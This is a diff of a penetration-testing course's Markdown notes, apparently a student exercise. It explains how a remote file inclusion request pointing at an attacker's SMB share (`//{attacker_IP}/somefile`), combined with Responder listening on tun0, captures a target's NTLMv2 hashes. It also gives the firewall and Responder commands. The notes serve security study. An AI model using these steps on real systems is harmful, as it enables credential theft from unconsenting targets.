hxrda/PenetrationTesting_Tunkeutumistestaus/h5-Kohti-omaa-treeniä.md

 	- **RFI**: Making the web server attempt to load a file from a remote source (e.g. the attacker's machine).
 If the remote source acts as an SMB server, the web server will try to access the SMB resource through the NTLM authentication process, which can lead to NTLM authentication leakage

 **C) Responder & NTLM Hash Capture**
-- Note: If a firewall has been configured, all incoming traffic should be allowed on TCP port 445 for the Responder to catch the hash: `sudo ufw allow 445/tcp`
+- **Note**: If a firewall has been configured, all incoming traffic should be allowed on TCP port 445 for the Responder to catch the hash: `sudo ufw allow 445/tcp`
 - To run the responder: `sudo responder -I tun0` or `sudo python3 /usr/share/responder/Responder.py – I tun0`
 - To execute the RFI exploit: `http://{domain_name}/?{parameter_name}=//{attacker_IP}/somefile`
 - With the Responder running and acting as a fake SMB server, the RFI triggers the target machine to authenticate to the attacker.
 This results in Responder capturing the NTLMv2 hash, including the username, domain, and challenge-response data.